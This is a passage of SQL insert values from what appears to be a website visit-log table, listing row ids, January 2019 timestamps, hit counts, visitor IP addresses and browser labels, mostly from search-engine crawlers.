367037,1546956654,1,1,0,0,'46.229.168.129','other'),(367038,1546956658,1,1,0,0,'54.36.148.129','other'),(367039,1546956719,1,1,0,0,'95.163.255.113','other'),(367040,1546956878,2,2,0,0,'95.163.255.114','other'),(367041,1546956903,1,1,0,0,'46.211.48.157','chrome'),(367042,1546956965,1,1,0,0,'95.163.255.119','other'),(367043,1546957139,2,2,0,0,'91.196.178.67','chrome'),(367044,1546957203,2,2,0,0,'66.249.66.156','chrome'),(367045,1546957236,1,1,0,0,'54.36.148.165','other'),(367046,1546957301,5,5,0,0,'216.244.66.241','other'),(367047,1546957364,1,1,0,0,'46.229.168.152','other'),(367048,1546957554,4,4,0,0,'91.196.178.90','chrome'),(367049,1546957806,2,2,0,0,'66.249.66.152','chrome'),(367050,1546957991,3,3,0,0,'66.249.66.154','chrome'),(367051,1546958272,1,1,0,0,'216.244.66.241','other'),(367052,1546958409,1,1,0,0,'54.165.59.7','other'),(367053,1546958434,1,1,0,0,'46.229.168.141','other'),(367054,1546958436,1,1,0,0,'46.229.168.135','other'),(367055,1546958471,1,1,0,0,'91.196.178.90','chrome'),(367056,1546958614,1,1,0,0,'66.249.66.157','chrome'),(367057,1546958897,3,3,0,0,'91.196.178.67','chrome'),(367058,1546958902,2,2,0,0,'91.196.178.87','firefox'),(367059,1546958942,1,1,0,0,'54.36.149.14','other'),(367060,1546959088,1,1,0,0,'178.94.251.21','firefox'),(367061,1546959287,1,1,0,0,'54.36.148.151','other'),(367062,1546959645,1,1,0,0,'54.36.148.230','other'),(367063,1546959880,1,1,0,0,'95.163.255.118','other'),(367064,1546960075,10,10,0,0,'216.244.66.241','other'),(367065,1546960143,1,1,0,0,'95.163.255.107','other'),(367066,1546960164,3,3,0,0,'66.249.66.152','chrome'),(367067,1546960224,1,1,0,0,'54.36.148.53','other'),(367068,1546960947,3,3,0,0,'157.55.39.146','other'),(367069,1546961103,1,1,0,0,'66.249.66.155','chrome'),(367070,1546961104,1,1,0,0,'66.249.66.156','chrome'),(367071,1546961393,1,1,0,0,'216.244.66.241','other'),(367072,1546961447,1,1,0,0,'66.249.66.40','chrome'),(367073,1546961825,1,1,0,0,'95.163.255.95','other'),(367074,1546961827,1,1,0,0,'95.163.255.97','other'),(367075,1546961830,1,1,0,0,'5.45.207.79','other'),(367076,1546962046,1,1,0,0,'8.29.198.26','other'),(367077,1546962281,1,1,0,0,'66.249.66.157','chrome'),(367078,1546962282,1,1,0,0,'66.249.66.156','chrome'),(367079,1546962482,1,1,0,0,'141.8.142.103','other'),(367080,1546962588,1,1,0,0,'37.9.113.20','other'),(367081,1546962613,3,3,0,0,'37.55.224.74','chrome'),(367082,1546962737,1,1,0,0,'87.250.224.65','other'),(367083,1546962794,1,1,0,0,'46.229.168.148','other'),(367084,1546962796,1,1,0,0,'46.229.168.146','other'),(367085,1546962863,4,4,0,0,'216.244.66.241','other'),(367086,1546962923,1,1,0,0,'66.249.93.218','chrome'),(367087,1546963181,1,1,0,0,'46.229.168.145','other'),(367088,1546963398,1,1,0,0,'8.29.198.27','other'),(367089,1546963399,1,1,0,0,'107.77.210.174','other'),(367090,1546963616,1,1,0,0,'46.229.168.152','other'),(367091,1546963718,1,1,0,0,'54.36.148.243','other'),(367092,1546963838,2,2,0,0,'46.229.168.151','other'),(367093,1546964297,2,2,0,0,'40.77.167.62','other'),(367094,1546964577,1,1,0,0,'54.36.149.87','other'),(367095,1546964861,2,2,0,0,'66.249.66.156','chrome'),(367096,1546964989,2,2,0,0,'46.211.25.232','chrome'),(367097,1546965650,8,8,0,0,'216.244.66.241','other'),(367098,1546965701,1,1,0,0,'66.249.66.154','chrome'),(367099,1546966287,1,1,0,0,'46.229.168.147','other'),(367100,1546966619,2,2,0,0,'66.249.66.154','chrome'),(367101,1546966745,1,1,0,0,'216.244.66.241','other'),(367102,1546966754,1,1,0,0,'66.249.66.40','chrome'),(367103,1546966787,1,1,0,0,'66.249.66.157','chrome'),(367104,1546966789,2,2,0,0,'66.249.66.156','chrome'),(367105,1546967361,1,1,0,0,'46.229.168.149','other'),(367106,1546967484,1,1,0,0,'180.76.15.11','other'),(367107,1546967485,1,1,0,0,'180.76.15.147','other'),(367108,1546967539,2,2,0,0,'66.249.66.42','chrome'),(367109,1546968185,1,1,0,0,'91.196.178.161','chrome'),(367110,1546968386,1,1,0,0,'46.229.168.154','other'),(367111,1546968391,1,1,0,0,'46.229.168.138','other'),(367112,1546968434,6,6,0,0,'216.244.66.241','other'),(367113,1546968456,1,1,0,0,'46.229.168.136','other'),(367114,1546968734,2,2,0,0,'66.249.66.155','chrome'),(367115,1546969182,2,2,0,0,'66.249.66.152','chrome'),(367116,1546969395,1,1,0,0,'66.249.66.40','chrome'),(367117,1546970102,1,1,0,0,'66.249.66.152','chrome'),(367118,1546970363,4,4,0,0,'216.244.66.241','other'),(367119,1546970455,2,2,0,0,'52.53.201.78','chrome'),(367120,1546970647,1,1,0,0,'66.249.66.155','chrome'),(367121,1546970648,1,1,0,0,'66.249.66.154','chrome'),(367122,1546971086,2,2,0,0,'95.163.255.104','other'),(367123,1546971186,1,1,0,0,'95.108.213.4','other'),(367124,1546971222,1,1,0,0,'95.163.255.105','other'),(367125,1546971300,2,2,0,0,'95.163.255.108','other'),(367126,1546971356,1,1,0,0,'95.163.255.115','other'),(367127,1546971549,1,1,0,0,'95.163.255.103','other'),(367128,1546971607,1,1,0,0,'66.249.66.44','chrome'),(367129,1546971609,1,1,0,0,'95.163.255.109','other'),(367130,1546971648,2,2,0,0,'157.55.39.146','other'),(367131,1546971665,4,4,0,0,'216.244.66.241','other'),(367132,1546971802,1,1,0,0,'66.249.66.156','chrome'),(367133,1546971803,1,1,0,0,'66.249.66.154','chrome'),(367134,1546971924,1,1,0,0,'66.249.66.152','chrome'),(367135,1546972222,1,1,0,0,'40.77.169.26','other'),(367136,1546972281,1,1,0,0,'54.36.148.151','other'),(367137,1546972476,2,2,0,0,'46.229.168.136','other'),(367138,1546972550,1,1,0,0,'66.249.66.44','chrome'),(367139,1546972709,3,3,0,0,'91.196.178.132','chrome'),(367140,1546972749,1,1,0,0,'54.36.149.61','other'),(367141,1546972762,1,1,0,0,'66.249.66.157','chrome'),(367142,1546972763,4,4,0,0,'66.249.66.154','chrome'),(367143,1546972883,1,1,0,0,'8.29.198.26','other'),(367144,1546973999,10,10,0,0,'216.244.66.241','other'),(367145,1546974191,2,2,0,0,'66.249.66.156','chrome'),(367146,1546974235,1,1,0,0,'8.29.198.26','other'),(367147,1546974535,1,1,0,0,'54.36.148.210','other'),(367148,1546974806,1,1,0,0,'40.77.167.8','other'),(367149,1546974947,2,2,0,0,'66.249.66.152','chrome'),(367150,1546975030,2,2,0,0,'46.229.168.133','other'),(367151,1546975413,1,1,0,0,'5.188.210.3','chrome'),(367152,1546975509,4,4,0,0,'66.249.66.156','chrome'),(367153,1546975572,1,1,0,0,'54.36.148.111','other'),(367154,1546975924,1,1,0,0,'66.249.66.44','chrome'),(367155,1546975988,1,1,0,0,'66.249.66.152','chrome'),(367156,1546976202,1,1,0,0,'66.249.66.154','chrome'),(367157,1546976569,2,2,0,0,'66.249.66.156','chrome'),(367158,1546976788,5,5,0,0,'216.244.66.241','other'),(367159,1546977884,1,1,0,0,'46.229.168.136','other'),(367160,1546977891,1,1,0,0,'66.249.66.157','chrome'),(367161,1546977941,3,3,0,0,'66.249.66.156','chrome'),(367162,1546978014,1,1,0,0,'54.36.149.13','other'),(367163,1546978032,1,1,0,0,'40.77.167.54','other'),(367164,1546978037,1,1,0,0,'54.36.148.212','other'),(367165,1546978097,1,1,0,0,'91.113.89.186','chrome'),(367166,1546978130,2,2,0,0,'66.249.66.42','chrome'),(367167,1546978134,1,1,0,0,'66.249.66.40','chrome'),(367168,1546978252,1,1,0,0,'66.249.66.152','chrome'),(367169,1546978289,2,2,0,0,'66.249.66.154','chrome'),(367170,1546978549,1,1,0,0,'66.249.66.44','chrome'),(367171,1546979054,1,1,0,0,'54.36.148.140','other'),(367172,1546979257,1,1,0,0,'207.46.13.171','other'),(367173,1546979490,1,1,0,0,'40.77.167.54','other'),(367174,1546979516,1,1,0,0,'66.249.66.155','chrome'),(367175,1546979517,1,1,0,0,'66.249.66.152','chrome'),(367176,1546979593,7,7,0,0,'216.244.66.241','other'),(367177,1546979689,2,2,0,0,'5.45.207.79','other'),(367178,1546979708,1,1,0,0,'46.229.168.147','other'),(367179,1546979710,1,1,0,0,'46.229.168.129','other'),(367180,1546979712,1,1,0,0,'178.154.244.11','other'),(367181,1546979728,1,1,0,0,'141.8.142.103','other'),(367182,1546979852,1,1,0,0,'66.249.66.42','chrome'),(367183,1546979938,1,1,0,0,'46.229.168.142','other'),(367184,1546980005,1,1,0,0,'54.36.148.171','other'),(367185,1546980033,1,1,0,0,'54.36.148.211','other'),(367186,1546980063,1,1,0,0,'207.46.13.17','other'),(367187,1546980317,1,1,0,0,'54.36.148.123','other'),(367188,1546980506,2,2,0,0,'37.9.113.148','other'),(367189,1546980514,1,1,0,0,'66.249.66.40','chrome'),(367190,1546980537,1,1,0,0,'66.249.66.157','chrome'),(367191,1546980632,2,2,0,0,'87.250.224.65','other'),(367192,1546980658,2,2,0,0,'5.45.207.79','other'),(367193,1546980672,2,2,0,0,'95.108.213.4','other'),(367194,1546980673,1,1,0,0,'46.229.168.138','other'),(367195,1546980724,1,1,0,0,'141.8.142.103','other'),(367196,1546980749,1,1,0,0,'66.249.66.152','chrome'),(367197,1546980772,1,1,0,0,'40.77.167.167','other'),(367198,1546980811,3,3,0,0,'178.154.244.11','other'),(367199,1546980886,2,2,0,0,'46.229.168.147','other'),(367200,1546980896,2,2,0,0,'5.45.207.19','other'),(367201,1546981001,1,1,0,0,'54.36.148.108','other'),(367202,1546981116,2,2,0,0,'144.168.162.250','chrome'),(367203,1546981279,1,1,0,0,'216.244.66.241','other'),(367204,1546981561,4,4,0,0,'5.45.207.79','other'),(367205,1546981614,1,1,0,0,'54.36.148.247','other'),(367206,1546981669,1,1,0,0,'54.36.148.103','other'),(367207,1546981743,1,1,0,0,'87.250.224.65','other'),(367208,1546981777,3,3,0,0,'141.8.142.103','other'),(367209,1546981859,2,2,0,0,'87.250.224.47','other'),(367210,1546981878,3,3,0,0,'5.45.207.19','other'),(367211,1546981882,4,4,0,0,'178.154.244.11','other'),(367212,1546981928,2,2,0,0,'66.249.66.152','chrome'),(367213,1546981958,1,1,0,0,'66.249.66.40','chrome'),(367214,1546981988,1,1,0,0,'40.77.167.158','other'),(367215,1546982135,1,1,0,0,'95.108.213.4','other'),(367216,1546982305,1,1,0,0,'46.229.168.143','other'),(367217,1546982307,1,1,0,0,'46.229.168.142','other'),(367218,1546982397,3,3,0,0,'216.244.66.241','other'),(367219,1546982501,1,1,0,0,'66.249.66.44','chrome'),(367220,1546982816,3,3,0,0,'66.249.66.156','chrome'),(367221,1546982843,1,1,0,0,'54.36.148.141','other'),(367222,1546982904,1,1,0,0,'40.77.167.158','other'),(367223,1546982938,1,1,0,0,'109.207.199.224','chrome'),(367224,1546983000,1,1,0,0,'5.45.207.19','other'),(367225,1546983407,1,1,0,0,'46.229.168.130','other'),(367226,1546983416,1,1,0,0,'66.249.66.152','chrome'),(367227,1546983512,1,1,0,0,'216.244.66.241','other'),(367228,1546983597,1,1,0,0,'40.77.167.161','other'),(367229,1546983612,3,3,0,0,'66.249.66.154','chrome'),(367230,1546983694,1,1,0,0,'54.36.148.249','other'),(367231,1546983702,1,1,0,0,'8.29.198.26','other'),(367232,1546983896,1,1,0,0,'66.249.66.155','chrome'),(367233,1546984217,2,2,0,0,'217.77.212.166','firefox'),(367234,1546984220,1,1,0,0,'207.46.13.35','other'),(367235,1546984313,1,1,0,0,'5.45.207.19','other'),(367236,1546984925,2,2,0,0,'66.249.66.152','chrome'),(367237,1546984998,1,1,0,0,'54.36.148.187','other'),(367238,1546985002,1,1,0,0,'54.36.149.2','other'),(367239,1546985070,1,1,0,0,'8.29.198.25','other'),(367240,1546985126,1,1,0,0,'66.249.66.154','chrome'),(367241,1546985261,1,1,0,0,'66.249.66.157','chrome'),(367243,1546985316,5,5,0,0,'216.244.66.241','other'),(367244,1546985637,1,1,0,0,'46.229.168.142','other'),(367245,1546986199,1,1,0,0,'157.55.39.82','other'),(367246,1546986231,1,1,0,0,'66.249.66.40','chrome'),(367247,1546986257,1,1,0,0,'54.36.148.188','other'),(367248,1546986418,1,1,0,0,'40.77.167.158','other'),(367249,1546986547,3,3,0,0,'40.77.167.161','other'),(367250,1546987112,4,4,0,0,'216.244.66.241','other'),(367251,1546987184,1,1,0,0,'66.249.66.44','chrome'),(367252,1546987395,2,2,0,0,'66.249.66.154','chrome'),(367253,1546987789,1,1,0,0,'66.249.66.156','chrome'),(367254,1546988234,4,4,0,0,'216.244.66.241','other'),(367255,1546988322,1,1,0,0,'40.77.167.161','other'),(367256,1546988600,2,2,0,0,'95.163.255.99','other'),(367257,1546988605,1,1,0,0,'66.249.66.157','chrome'),(367258,1546988606,1,1,0,0,'66.249.66.154','chrome'),(367259,1546988992,2,2,0,0,'37.9.113.148','other'),(367260,1546989110,1,1,0,0,'95.108.213.4','other'),(367261,1546989166,2,2,0,0,'40.77.167.158','other'),(367262,1546989251,1,1,0,0,'178.154.244.11','other'),(367263,1546989328,1,1,0,0,'87.250.224.47','other'),(367264,1546989351,1,1,0,0,'54.36.148.236','other'),(367265,1546989367,1,1,0,0,'207.46.13.24','other'),(367266,1546989374,1,1,0,0,'5.255.253.38','other'),(367267,1546989377,1,1,0,0,'5.45.207.79','other'),(367268,1546990470,1,1,0,0,'66.249.66.44','chrome'),(367269,1546990719,12,12,0,0,'216.244.66.241','other'),(367270,1546990739,1,1,0,0,'207.46.13.35','other'),(367271,1546990769,1,1,0,0,'54.36.149.12','other'),(367272,1546991107,1,1,0,0,'40.77.167.158','other'),(367273,1546991720,1,1,0,0,'54.36.149.31','other'),(367274,1546991917,1,1,0,0,'95.163.255.192','other'),(367275,1546991930,1,1,0,0,'216.244.66.241','other'),(367276,1546991980,1,1,0,0,'66.249.66.155','chrome'),(367277,1546991981,1,1,0,0,'66.249.66.156','chrome'),(367278,1546992000,1,1,0,0,'95.163.255.158','other'),(367279,1546992141,1,1,0,0,'66.249.66.157','chrome'),(367280,1546992152,1,1,0,0,'66.249.66.154','chrome'),(367281,1546992744,1,1,0,0,'104.131.147.112','other'),(367282,1546992889,1,1,0,0,'54.36.148.163','other'),(367283,1546993463,6,6,0,0,'216.244.66.241','other'),(367284,1546993605,1,1,0,0,'157.55.39.108','other'),(367285,1546993627,1,1,0,0,'66.249.66.57','chrome'),(367286,1546993628,1,1,0,0,'66.249.66.44','chrome'),(367287,1546993837,1,1,0,0,'54.36.148.168','other'),(367288,1546993865,1,1,0,0,'5.45.207.79','other'),(367289,1546993946,1,1,0,0,'66.249.66.154','chrome'),(367290,1546994099,1,1,0,0,'46.229.168.129','other'),(367291,1546994274,1,1,0,0,'66.249.66.42','chrome'),(367292,1546994478,2,2,0,0,'216.244.66.241','other'),(367293,1546994535,1,1,0,0,'8.29.198.26','other'),(367294,1546994609,1,1,0,0,'193.238.36.206','chrome'),(367295,1546995068,2,2,0,0,'66.249.66.154','chrome'),(367296,1546995104,1,1,0,0,'88.99.2.203','other'),(367297,1546995115,1,1,0,0,'66.249.66.156','chrome'),(367298,1546995139,1,1,0,0,'66.249.66.155','chrome'),(367300,1546995322,1,1,0,0,'109.70.100.20','other'),(367301,1546995404,1,1,0,0,'46.229.168.136','other'),(367302,1546995470,1,1,0,0,'207.46.13.35','other'),(367303,1546995507,1,1,0,0,'66.249.66.40','chrome'),(367304,1546995690,1,1,0,0,'46.229.168.154','other'),(367305,1546995811,1,1,0,0,'5.45.207.79','other'),(367306,1546995895,1,1,0,0,'8.29.198.26','other'),(367307,1546996128,1,1,0,0,'54.36.148.205','other'),(367308,1546996217,1,1,0,0,'180.76.15.14','other'),(367309,1546996231,7,7,0,0,'216.244.66.241','other'),(367310,1546996428,1,1,0,0,'46.229.168.150','other'),(367311,1546996486,1,1,0,0,'66.249.66.156','chrome'),(367312,1546997024,1,1,0,0,'46.229.168.137','other'),(367313,1546997026,1,1,0,0,'46.229.168.148','other'),(367314,1546997234,1,1,0,0,'207.46.13.35','other'),(367315,1546997534,1,1,0,0,'46.229.168.130','other'),(367316,1546997577,1,1,0,0,'66.249.66.42','chrome'),(367317,1546997695,1,1,0,0,'13.66.139.0','other'),(367318,1546998513,2,2,0,0,'66.249.66.156','chrome'),(367319,1546998574,1,1,0,0,'54.36.149.19','other'),(367320,1546998624,1,1,0,0,'207.46.13.35','other'),(367321,1546998956,2,2,0,0,'66.249.66.154','chrome'),(367322,1546999006,16,16,0,0,'216.244.66.241','other'),(367323,1546999192,2,2,0,0,'66.249.66.157','chrome'),(367324,1546999813,1,1,0,0,'66.249.66.156','chrome'),(367325,1547000399,1,1,0,0,'216.244.66.241','other'),(367326,1547000513,1,1,0,0,'66.249.66.59','chrome'),(367327,1547000514,1,1,0,0,'66.249.66.42','chrome'),(367328,1547000573,1,1,0,0,'46.229.168.151','other'),(367329,1547000574,1,1,0,0,'46.229.168.137','other'),(367330,1547000646,1,1,0,0,'66.249.66.154','chrome'),(367331,1547001218,1,1,0,0,'46.229.168.134','other'),(367332,1547001638,1,1,0,0,'54.36.148.97','other'),(367333,1547001786,8,8,0,0,'216.244.66.241','other'),(367334,1547001807,1,1,0,0,'207.46.13.35','other'),(367335,1547001946,1,1,0,0,'66.249.66.154','chrome'),(367336,1547002090,1,1,0,0,'207.46.13.24','other'),(367337,1547002304,1,1,0,0,'88.99.2.203','other'),(367338,1547002341,2,2,0,0,'66.249.66.152','chrome'),(367339,1547002721,1,1,0,0,'216.244.66.241','other'),(367340,1547002779,1,1,0,0,'66.249.66.42','chrome'),(367341,1547002983,1,1,0,0,'207.46.13.35','other'),(367342,1547003525,1,1,0,0,'178.154.244.11','other'),(367343,1547003639,1,1,0,0,'46.229.168.151','other'),(367344,1547003640,1,1,0,0,'46.229.168.145','other'),(367345,1547003947,1,1,0,0,'46.229.168.137','other'),(367346,1547003948,1,1,0,0,'46.229.168.139','other'),(367347,1547004330,1,1,0,0,'54.36.148.185','other'),(367348,1547004590,5,5,0,0,'216.244.66.241','other'),(367349,1547005219,1,1,0,0,'54.36.148.123','other'),(367350,1547005371,1,1,0,0,'8.29.198.27','other'),(367351,1547005754,1,1,0,0,'46.229.168.136','other'),(367352,1547005877,1,1,0,0,'66.249.66.157','chrome'),(367353,1547005881,1,1,0,0,'66.249.66.154','chrome'),(367354,1547006055,2,2,0,0,'91.209.11.236','other'),(367355,1547006188,1,1,0,0,'216.244.66.241','other'),(367356,1547006305,1,1,0,0,'66.249.66.155','chrome'),(367358,1547006608,1,1,0,0,'95.108.213.4','other'),(367359,1547006617,2,2,0,0,'5.45.207.19','other'),(367360,1547006716,1,1,0,0,'66.249.66.156','chrome'),(367361,1547006720,1,1,0,0,'8.29.198.26','other'),(367362,1547006751,1,1,0,0,'66.249.66.152','chrome'),(367363,1547006755,2,2,0,0,'46.229.168.148','other'),(367364,1547007091,1,1,0,0,'178.154.244.11','other'),(367365,1547007355,12,12,0,0,'216.244.66.241','other'),(367366,1547007360,1,1,0,0,'5.45.207.79','other'),(367367,1547007417,1,1,0,0,'207.46.13.35','other'),(367368,1547007690,1,1,0,0,'46.229.168.147','other'),(367369,1547008140,1,1,0,0,'66.249.66.156','chrome'),(367370,1547008406,2,2,0,0,'66.249.66.152','chrome'),(367371,1547008511,1,1,0,0,'216.244.66.241','other'),(367372,1547008951,1,1,0,0,'54.36.149.16','other'),(367373,1547009160,1,1,0,0,'54.36.148.128','other'),(367374,1547009189,1,1,0,0,'40.77.167.149','other'),(367375,1547009228,1,1,0,0,'66.249.66.154','chrome'),(367376,1547009655,1,1,0,0,'54.36.149.3','other'),(367377,1547009821,1,1,0,0,'5.45.207.19','other'),(367378,1547010127,1,1,0,0,'54.36.148.119','other'),(367379,1547010153,8,8,0,0,'216.244.66.241','other'),(367380,1547010336,3,3,0,0,'66.249.66.40','chrome'),(367381,1547010896,1,1,0,0,'40.77.167.155','other'),(367382,1547011187,2,2,0,0,'216.244.66.241','other'),(367383,1547011272,2,2,0,0,'66.249.66.156','chrome'),(367384,1547011395,2,2,0,0,'34.223.223.176','chrome'),(367385,1547011890,1,1,0,0,'54.36.148.161','other'),(367386,1547012108,1,1,0,0,'66.249.66.152','chrome'),(367387,1547012417,1,1,0,0,'95.163.255.68','other'),(367388,1547012421,1,1,0,0,'95.163.255.62','other'),(367389,1547012663,1,1,0,0,'54.36.148.134','other'),(367390,1547012894,2,2,0,0,'207.46.13.24','other'),(367391,1547012918,1,1,0,0,'46.229.168.137','other'),(367392,1547012977,1,1,0,0,'5.45.207.19','other'),(367393,1547013255,2,2,0,0,'216.244.66.241','other'),(367394,1547013410,1,1,0,0,'46.229.168.151','other'),(367395,1547014032,1,1,0,0,'185.107.94.233','other'),(367396,1547014052,1,1,0,0,'5.45.207.19','other'),(367397,1547014124,1,1,0,0,'46.229.168.136','other'),(367398,1547014436,1,1,0,0,'207.46.13.35','other'),(367399,1547014646,1,1,0,0,'46.229.168.145','other'),(367400,1547014746,1,1,0,0,'66.249.66.44','chrome'),(367401,1547015519,1,1,0,0,'40.77.167.21','other'),(367402,1547015578,3,3,0,0,'91.196.178.79','chrome'),(367403,1547015786,3,3,0,0,'216.244.66.241','other'),(367404,1547015830,1,1,0,0,'66.249.66.152','chrome'),(367405,1547016028,1,1,0,0,'5.45.207.19','other'),(367406,1547016081,2,2,0,0,'87.250.224.47','other'),(367407,1547016208,1,1,0,0,'8.29.198.25','other'),(367408,1547016226,2,2,0,0,'141.8.142.103','other'),(367409,1547016299,1,1,0,0,'87.250.224.65','other'),(367410,1547016302,1,1,0,0,'37.9.113.103','other'),(367411,1547016305,1,1,0,0,'37.9.113.148','other'),(367412,1547016308,2,2,0,0,'5.45.207.79','other'),(367413,1547016459,1,1,0,0,'66.249.66.156','chrome'),(367414,1547016620,2,2,0,0,'37.55.24.60','chrome'),(367415,1547016652,2,2,0,0,'93.171.245.238','chrome'),(367416,1547016688,9,9,0,0,'216.244.66.241','other'),(367417,1547016801,2,2,0,0,'178.154.244.11','other'),(367418,1547016955,1,1,0,0,'46.211.149.44','chrome'),(367419,1547017553,1,1,0,0,'8.29.198.26','other'),(367420,1547017716,1,1,0,0,'66.249.66.61','chrome'),(367422,1547017777,1,1,0,0,'66.249.66.156','chrome'),(367423,1547017790,4,4,0,0,'216.244.66.241','other'),(367424,1547017903,1,1,0,0,'46.229.168.132','other'),(367425,1547018083,2,2,0,0,'66.249.66.40','chrome'),(367426,1547018811,8,8,0,0,'216.244.66.241','other'),(367427,1547019797,4,4,0,0,'216.244.66.241','other'),(367428,1547020164,1,1,0,0,'54.36.148.239','other'),(367429,1547020547,2,2,0,0,'37.55.224.74','chrome'),(367430,1547020666,1,1,0,0,'66.249.66.44','chrome'),(367431,1547020684,1,1,0,0,'54.36.149.106','other'),(367432,1547020773,3,3,0,0,'66.249.66.152','chrome'),(367433,1547021115,1,1,0,0,'54.36.149.35','other'),(367434,1547021294,2,2,0,0,'91.196.178.163','chrome'),(367435,1547021338,2,2,0,0,'66.249.66.156','chrome'),(367436,1547021350,4,4,0,0,'216.244.66.241','other'),(367437,1547021366,2,2,0,0,'40.77.167.106','other'),(367438,1547021387,1,1,0,0,'66.249.66.157','chrome'),(367439,1547021482,4,4,0,0,'91.196.178.186','chrome'),(367440,1547021819,1,1,0,0,'95.163.255.99','other'),(367441,1547021821,1,1,0,0,'95.163.255.95','other'),(367442,1547022201,1,1,0,0,'157.55.39.142','other'),(367443,1547022430,3,3,0,0,'216.244.66.241','other'),(367444,1547022672,1,1,0,0,'54.36.148.81','other'),(367445,1547023111,1,1,0,0,'54.36.148.199','other'),(367446,1547023321,11,11,0,0,'91.196.178.79','chrome'),(367447,1547023581,8,8,0,0,'5.9.66.153','other'),(367448,1547023729,3,3,0,0,'91.196.178.79','firefox'),(367449,1547024170,1,1,0,0,'40.77.167.106','other'),(367450,1547024241,7,7,0,0,'216.244.66.241','other'),(367451,1547024260,1,1,0,0,'31.43.31.110','chrome'),(367453,1547024309,3,3,0,0,'91.124.182.170','firefox'),(367454,1547024356,1,1,0,0,'46.229.168.154','other'),(367455,1547024658,2,2,0,0,'62.80.181.81','other'),(367456,1547024749,1,1,0,0,'46.229.168.144','other'),(367457,1547025153,2,2,0,0,'91.196.178.79','chrome'),(367458,1547025238,2,2,0,0,'216.244.66.241','other'),(367459,1547025598,1,1,0,0,'66.249.66.154','chrome'),(367460,1547026003,1,1,0,0,'91.196.178.90','chrome'),(367461,1547026049,4,4,0,0,'91.196.178.66','firefox'),(367462,1547026072,3,3,0,0,'91.196.178.79','chrome'),(367463,1547026422,1,1,0,0,'46.211.111.90','chrome'),(367464,1547026457,1,1,0,0,'80.252.153.33','firefox'),(367465,1547026480,1,1,0,0,'91.196.178.186','chrome'),(367466,1547026547,1,1,0,0,'5.45.207.19','other'),(367467,1547026584,1,1,0,0,'178.154.244.11','other'),(367468,1547026588,4,4,0,0,'5.45.207.79','other'),(367469,1547026752,1,1,0,0,'66.249.66.156','chrome'),(367470,1547026902,11,11,0,0,'216.244.66.241','other'),(367471,1547026995,1,1,0,0,'91.196.178.79','chrome'),(367472,1547027044,1,1,0,0,'8.29.198.26','other'),(367473,1547027291,1,1,0,0,'66.249.66.59','chrome'),(367474,1547027405,1,1,0,0,'31.184.238.101','chrome'),(367475,1547027829,1,1,0,0,'80.252.153.33','firefox'),(367476,1547027933,2,2,0,0,'95.213.141.126','opera'),(367477,1547028266,2,2,0,0,'216.244.66.241','other'),(367478,1547028368,1,1,0,0,'66.249.66.156','chrome'),(367479,1547028369,1,1,0,0,'66.249.66.154','chrome'),(367480,1547028396,1,1,0,0,'8.29.198.27','other'),(367481,1547028716,3,3,0,0,'91.196.178.79','chrome'),(367482,1547028945,1,1,0,0,'66.249.66.152','chrome'),(367483,1547029041,1,1,0,0,'40.77.167.164','other'),(367484,1547029119,2,2,0,0,'46.219.2.17','firefox'),(367485,1547029156,1,1,0,0,'91.196.178.186','chrome'),(367486,1547029382,1,1,0,0,'46.229.168.149','other'),(367487,1547029682,6,6,0,0,'216.244.66.241','other'),(367488,1547029859,1,1,0,0,'54.36.148.251','other'),(367489,1547030072,3,3,0,0,'91.196.178.97','chrome'),(367490,1547030087,1,1,0,0,'54.36.148.55','other'),(367491,1547030096,2,2,0,0,'66.249.66.156','chrome'),(367492,1547030593,1,1,0,0,'46.229.168.153','other'),(367493,1547030700,1,1,0,0,'207.46.13.139','other'),(367494,1547030737,1,1,0,0,'66.249.66.42','chrome'),(367495,1547030962,2,2,0,0,'216.244.66.241','other'),(367496,1547031086,1,1,0,0,'54.36.148.25','other'),(367497,1547031156,1,1,0,0,'46.229.168.145','other'),(367498,1547031902,1,1,0,0,'54.36.148.132','other'),(367499,1547032294,2,2,0,0,'46.229.168.129','other'),(367500,1547032295,1,1,0,0,'46.229.168.147','other'),(367501,1547032340,1,1,0,0,'66.249.66.40','chrome'),(367502,1547032355,1,1,0,0,'66.249.66.155','chrome'),(367503,1547032360,1,1,0,0,'66.249.66.154','chrome'),(367504,1547032361,1,1,0,0,'66.249.66.156','chrome'),(367506,1547032463,13,13,0,0,'216.244.66.241','other'),(367507,1547032760,1,1,0,0,'66.249.66.152','chrome'),(367508,1547033081,1,1,0,0,'46.229.168.148','other'),(367509,1547033105,1,1,0,0,'54.36.149.87','other'),(367510,1547033481,3,3,0,0,'216.244.66.241','other'),(367511,1547033634,1,1,0,0,'66.249.66.42','chrome'),(367512,1547033697,1,1,0,0,'66.249.66.152','chrome'),(367513,1547033710,1,1,0,0,'5.45.207.19','other'),(367514,1547033738,1,1,0,0,'66.249.66.40','chrome'),(367515,1547033755,1,1,0,0,'66.249.66.156','chrome'),(367516,1547033826,2,2,0,0,'91.196.178.97','chrome'),(367517,1547034546,1,1,0,0,'46.229.168.134','other'),(367518,1547034603,1,1,0,0,'66.249.66.152','chrome'),(367519,1547034781,1,1,0,0,'207.46.13.139','other'),(367520,1547034991,1,1,0,0,'54.36.148.112','other'),(367521,1547035039,1,1,0,0,'54.36.149.50','other'),(367522,1547035081,1,1,0,0,'66.249.66.57','chrome'),(367523,1547035082,1,1,0,0,'66.249.66.44','chrome'),(367524,1547035091,1,1,0,0,'40.77.167.164','other'),(367525,1547035193,1,1,0,0,'46.229.168.150','other'),(367526,1547035242,5,5,0,0,'216.244.66.241','other'),(367527,1547035612,1,1,0,0,'66.249.66.152','chrome'),(367528,1547035952,1,1,0,0,'46.229.168.137','other'),(367529,1547036133,1,1,0,0,'66.249.66.154','chrome'),(367530,1547036240,1,1,0,0,'66.249.66.156','chrome'),(367531,1547036449,7,7,0,0,'91.196.178.79','chrome'),(367532,1547036451,1,1,0,0,'46.229.168.136','other'),(367533,1547036553,2,2,0,0,'216.244.66.241','other'),(367534,1547036694,1,1,0,0,'54.36.148.139','other'),(367535,1547036786,1,1,0,0,'37.9.113.20','other'),(367536,1547036983,1,1,0,0,'54.36.148.145','other'),(367537,1547037266,1,1,0,0,'95.108.213.4','other'),(367538,1547037297,1,1,0,0,'178.154.171.27','other'),(367539,1547037328,1,1,0,0,'5.45.207.8','other'),(367540,1547037332,2,2,0,0,'66.249.66.44','chrome'),(367541,1547037498,1,1,0,0,'95.24.201.51','chrome'),(367542,1547037524,1,1,0,0,'46.229.168.141','other'),(367543,1547037595,1,1,0,0,'66.249.66.157','chrome'),(367545,1547037663,1,1,0,0,'5.45.207.79','other'),(367546,1547037883,1,1,0,0,'8.29.198.26','other'),(367547,1547037913,1,1,0,0,'54.36.149.57','other'),(367548,1547038046,4,4,0